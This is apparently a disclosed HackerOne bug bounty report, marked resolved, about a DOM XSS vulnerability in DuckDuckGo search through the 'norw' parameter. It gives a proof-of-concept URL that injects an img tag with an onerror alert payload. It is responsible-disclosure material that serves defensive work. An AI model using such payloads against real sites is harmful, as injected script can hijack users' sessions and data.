DOM XSS on duckduckgo.com search

Disclosed: 2020-06-14 11:37:58 By cujanovic To duckduckgo
High
Vulnerability Details
Hello, The is a DOM XSS vulnerability on https://duckduckgo.com search through the ```norw``` parameter. PoC URL: ```https://duckduckgo.com/?q=a&norw="><img src=/ onerror=alert(document.domain)>``` Screenshot: {F820482} ## Impact The attacker can execute JS code.
Actions
View on HackerOne
Report Stats
  • Report ID: 868934
  • State: Closed
  • Substate: resolved
  • Upvotes: 319
Share this report